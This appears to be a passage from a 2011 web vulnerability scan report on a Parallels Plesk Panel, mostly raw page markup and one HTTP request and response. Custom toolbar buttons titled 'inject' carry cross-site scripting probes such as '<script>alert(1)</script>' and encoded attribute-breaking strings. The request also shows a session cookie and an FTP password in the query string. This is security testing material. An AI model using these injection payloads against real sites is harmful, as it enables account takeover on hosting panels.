\"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; }"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/ftp-access_32.gif","title":"FTP Access","comment":"Set up access to files of your websites over FTP protocol.","href":"\/web\/ftp-access"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/dns_32.gif","title":"DNS Settings","comment":"Manage DNS zones for your domain names.","href":"\/web\/proxy\/type\/dns"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/certificates_32.gif","title":"SSL Certificates","comment":"Install an SSL certificate on a domain to secure data that your site visitors send to and receive from the site.","href":"\/web\/proxy\/type\/ssl-certificates"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/backup_32.gif","title":"Backup Manager","comment":"Back up and restore your domains, including settings and content of websites and mail accounts.","href":"\/web\/backup"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/hosting-setup_32.gif","title":"Web Hosting Settings","comment":"Manage the global hosting settings for all websites, and set up a password for access to the webspace for uploading files.","href":"\/web\/edit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/databases_32.gif","title":"Databases","comment":"Create and remove databases used by your websites, and manage them using integrated administrative web application.","href":"\/database\/list"},{"componentType":"Smb.ToolButton","href":"fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab12c6c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"<script>alert(1)<\/script>?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?%00ddf96<a>904a89e5ae2","icon":"\/images\/custom_buttons\/{0-abc54de0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063<a>01df0b1d826?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bc2ea8c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063%253ca%253e01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd2637c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00cf063<a>01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-be190400-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ca6d6340-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2%253ca%253e3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cb24ad20-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_%00b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cbdbf700-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_c3316%2522%253e%253ca%253ee36b31545cd?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d2e12520-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4d488%2522a%253d%2522b%2522c2595ff0661?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d504a160-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4afbe%2522%2520a%253db%2520ca44d269b97?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d7281da0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/xss.cx?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"XSS.CX","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b51d93c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"}] }, {
componentType: 'Jsw.Panel',
id: 'advancedPanel',
title: 'Show Advanced Operations',
hideContentTitle: 'Hide Advanced Operations',
cls: 'tools-list-box operations-list-box',
hidden: true,
items: [{
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
emptyItemClass: 'tools-item-empty',
items: [{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/protected-dirs_16.gif","title":"Password-protected Directories","comment":"Restrict access to selected areas of your websites with password protection.","href":"\/web\/proxy\/type\/protected-dirs"},null,null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/maintenance-mode_16.gif","title":"Website Maintenance Mode","comment":"Switch a site off for maintenance and let the site visitors know that this is done on purpose and the site will be up soon.","href":"\/web\/proxy\/type\/maintenance-mode"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/copy_16.gif","title":"Website Copying","comment":"Copy website files to another site or external FTP storage.","href":"\/web\/proxy\/type\/copy"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/site-production_16.gif","title":"Learn How to Move a Site from Development to Production","comment":"View instructions on how to put an updated website into production.","href":"\/web\/site-production"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/how-to-clone-site_16.gif","title":"Learn How to Clone a Site to Development Environment","comment":"View instructions on how to clone the whole website (files, databases and applications).","href":"\/web\/how-to-clone-site"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/logs_16.gif","title":"Logs","comment":"View logs and configure recycling of log files.","href":"\/web\/proxy\/type\/logs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/hotlink-prot_16.gif","title":"Hotlink Protection","comment":"Protect content of your websites from hotlinking.","href":"\/web\/proxy\/type\/hotlink-protection"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-dirs_16.gif","title":"Virtual Directories","comment":"Create and manage virtual directories for your websites.","href":"\/web\/proxy\/type\/web-dirs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/band-limit_16.gif","title":"Bandwidth Limiting","comment":"Adjust the limit on bandwidth usage and connections to your websites.","href":"\/web\/proxy\/type\/bandwidth-limit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/iis-app-pool_16.gif","title":"Dedicated IIS Application Pool for Your Websites","comment":"Set up a dedicated IIS application pool for serving websites associated with the currently selected subscription.","href":"\/web\/iis-app-pool"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/dom-aliases_16.gif","title":"Domain Aliases","comment":"View and manage alternative domain names for your websites.","href":"\/web\/proxy\/type\/domain-aliases"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/shared-ssl_16.gif","title":"Master SSL Domain","comment":"Use an SSL certificate associated with one of your websites for securing connections to other sites with the shared SSL service.","href":"\/web\/master-shared-ssl"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-users_16.gif","title":"Web Users","comment":"Set up accounts for users who can host personal web pages on your websites.","href":"\/web\/web-users"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/odbc-dc_16.gif","title":"ODBC Data Sources","comment":"Set up ODBC data sources.","href":"\/web\/proxy\/type\/odbc-data-sources"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/asp-net-settings_16.gif","title":"ASP.NET Settings","comment":"Configure the settings of ASP.NET framework.","href":"\/web\/proxy\/type\/asp-net-settings"},null] }]
}]
});


new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',

items: [
new Jsw.Hint({
hint: 'A website is a collection of related web pages, images, videos, and other files that are accessible by a common domain name. Here is a list of your websites, from which you can change website hosting settings, open a website directory in file manager, view statistics on website visits, install an SSL certificate, view web server logs, and change DNS zone settings.' }),

new Jsw.List({
id: 'sites-list',
searchable: false,
disabledSelectHint: 'The main domain name cannot be removed.',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":1,"totalItemCount":1,"firstItemNumber":1,"lastItemNumber":1},"state":{"sortField":"displayName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":[],"forceShowSearch":false},"data":[{"mainDomain":true,"id":"d:1","domainId":1,"sortKey":"vulnerable.host.fqdn_","displayName":"nosedivesailing.com","statusInactive":null,"hostingType":"vrt_hst","webrootDir":"httpdocs","forwardingUrl":null,"changeHostingUrl":"\/web\/change-hosting\/id\/1","setupUrl":"\/web\/settings\/id\/1","filemanagerUrl":"\/web\/file-manager\/dir\/%2Fhttpdocs","sitebuilderUrl":"","sitebuilderLegacyUrl":null,"statisticsUrl":"window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false;","certificatesUrl":"\/web\/proxy\/type\/ssl-certificates\/id\/1","logsUrl":"\/web\/proxy\/type\/logs\/id\/1","dnsUrl":"\/web\/proxy\/type\/dns\/id\/1","previewUrl":"window.open(\"\/sitepreview\/http\/vulnerable.host.fqdn\/?randomHash=fac86a6afec6c447c6c1492a91272242\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; ","maintenanceMode":false,"maintenanceModeUrl":"\/web\/maintenance-mode\/id\/1"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/web/list-data',

isDisabledItem: function(item) {
return item.mainDomain;
},

columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Domain',
sortable: true,
dataIndex: 'displayName',
renderer: function(item) {
var inactivitySign = item.statusInactive
? '<b>inactive</b>'
: '';

var link = '<a href="' + Jsw.baseUrl + item.setupUrl + '">'
+ item.displayName.escapeHTML() + '</a>';


if (item.mainDomain) {
link = '<strong class="primary-domain">' + link + '</strong>';
}

if (item.statusInactive) {
link = link
+ '<div class="hint-attention">'
+ 'Inactive' + '</div>';
}

if (item.maintenanceMode) {
link = link
+ '<div class="hint-attention">'
+ 'Switched off for maintenance.' + ' <a href="' + Jsw.baseUrl + item.maintenanceModeUrl + '">'
+ 'Change' + '</a>'
+ '</div>';
}

if (item.hostingType == 'subdomain') {
link = '<div class="level1">' + link + '</div>';
}

return link;
}
},
{
header: 'Hosting',
sortable: false,
renderer: function(item) {
var message = '';

if (item.hostingType == 'vrt_hst' || item.hostingType == 'subdomain') {

var webrootDir = item.webrootDir;

if (item.filemanagerUrl) {
webrootDir = '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ item.webrootDir
+ '</a>';
}

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/website_16.gif"/>'
+ ' '
+ 'Website at' + ' '
+ webrootDir;

} else if (item.hostingType == 'none') {
message = '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" />'
+ '<em class="hint">' + 'No web hosting' + '</em>'
+ ' '
+ '<a href="' + Jsw.baseUrl + item.changeHostingUrl + '">['
+ 'add' + ']</a>';

} else if (item.hostingType == 'frm_fwd' || item.hostingType == 'std_fwd') {

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
+ ' '
+ 'Forward to' + ' '
+ '<a href="' + item.forwardingUrl + '">'
+ item.forwardingUrl
+ '</a>';
}

return message;
}
},
{
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {

var content = '';

content += !item.previewUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Preview the website in your browser. Note that some scripts and Flash animation used on the site might not work in the preview mode.' + '</span>'
+ '<a href="#" onclick=\'' + item.previewUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/preview_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.filemanagerUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Go to website folder for managing files of the website.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/website-folder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType != 'subdomain') {
content += !item.sitebuilderUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.sitebuilderUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';
}
content += !item.sitebuilderLegacyUrl
? ''
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder 4.5 (legacy).' + '</span>'
+ '<a href="' + item.sitebuilderLegacyUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType == 'subdomain' && !item.sitebuilderLegacyUrl) {
content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> ';
}

content += !item.statisticsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View website visits statistics.' + '</span>'
+ '<a href="#" onclick=\'' + item.statisticsUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/stats_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.certificatesUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Secure the site with an SSL certificate.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.certificatesUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/ssl-cert_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.logsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View logs.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.logsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/logs_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.dnsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Change DNS zone settings.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.dnsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/dns_16.gif"/>'
+ '</a>'
+ '</span> ';

return content;
}
}
],

operations: [
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddDomain',
cls: 's-btn sb-new-domain',
title: 'Add New Domain',
description: 'Host a new website on this server, set up web forwarding to another website, or set up a domain DNS zone if you want to have only e-mail addresses under a domain name.',
handler: function() {
Jsw.redirect('/web/add-domain');
}
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddSubDomain',
cls: 's-btn sb-new-subdomain',
title: 'Add New Subdomain',
description: 'Create a site addressed by a third-level domain name, like shop.example.com.',
handler: function() {
Jsw.redirect('/web/add-subdomain');
}
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRegisterDomain',
cls: 's-btn sb-register-domain',
title: 'Register Domain Names',
description: 'Register domain names with a domain name registrar recommended by your provider.',
href: '/web/mpc-register-domain',
target: '_blank'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonManageDomains',
cls: 's-btn sb-manage-domains',
title: 'Manage Domain Names',
description: 'Manage domain names that you registered with your provider: Update registration information, specify name servers, and renew domain registration.',
href: '/web/mpc-manage-domains',
target: '_blank'
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveSite',
title: 'Remove',
description: 'Remove the selected sites and all their web content, including apps, and mail data.',
cls: 's-btn sb-remove-selected',
handler: function() {
Jsw.getComponent('sites-list').execGroupOperation({
url: '/web/delete/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Confirm that you want to remove the selected sites.' }
});
}
}],

onRedraw: function() {
$('sites-list').select('input[name="listCheckbox[]"]').each(function(checkbox) {
checkbox.observe('click', function() {
// if domain selected
if ('undefined' == typeof checkbox.up('tr').down('div.level1')) {
var nextRows = checkbox.up('tr').nextSiblings();
nextRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
throw $break;
}
rowElement.down('input[name="listCheckbox[]"]').checked = checkbox.checked;
if (checkbox.checked) {
rowElement.addClassName('selected');
} else {
rowElement.removeClassName('selected');
}
});
} else {
var prevRows = checkbox.up('tr').previousSiblings();
prevRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
if (!checkbox.checked) {
var parentCheckbox = rowElement.down('input[name="listCheckbox[]"]');
if (parentCheckbox) {
parentCheckbox.checked = false;
rowElement.removeClassName('selected');
}
}
throw $break;
}
});
}
});
});
}
})
]
});

});
//]]>
</script>

</div> <!-- /main -->

<div id="secondary">
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

8.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view/id/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: advancedPanel-hidden=0; advancedPanel-hidden=0; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:35:43 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:35:44 GMT
Connection: close
Content-Length: 40354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Websites &amp; Domains - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="web-sites-and-domains">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/view" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fview%2Fid%2F1%2F%253Cscript%253Ealert%281%29%253C%2Fscript%253E%3Fdom_id%3D1%26dom_name%3Dnosedivesailing.com%26ftp_user%3Dxsscx%26ftp_pass%3DLL12345%252521%252521%26cl_id%3D2%26cname%3DHoyt%2BLLC%2BResearch%26pname%3DHoyt%2BLLC%2BResearch%26email%3Dh02332%2540gmail.com' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Websites &amp; Domains</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.namespace('Smb.Views.Web');

Smb.Views.Web.updateSiteCopyStatus = function() {
new Ajax.Request(Jsw.baseUrl + '/web/site-copy-status/taskId/', {
method: 'get',
parameters: {},
onSuccess: function(transport) {
var result = transport.responseText.evalJSON();

if ('running' == result.status) {
setTimeout("Smb.Views.Web.updateSiteCopyStatus()", 10000);
} else {
$('siteCopyProgress').remove();
if ('ok' == result.status) {
Jsw.addStatusMessage('info', result.message);
} else {
Jsw.addStatusMessage('error', result.message);
}
}
}
});
}

Jsw.onReady(function() {

new Jsw.Container({
renderTo: 'main',
items: [{
componentType: 'Jsw.Hint',
hint: 'This is where you set up and manage websites. If you have several subscriptions associated with your account, then you can switch from one subscription to another by selecting the required subscription at the top of the screen. Note that you can host a number of websites under a single subscription, so there is no need to purchase any additional subscriptions.' }, {
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
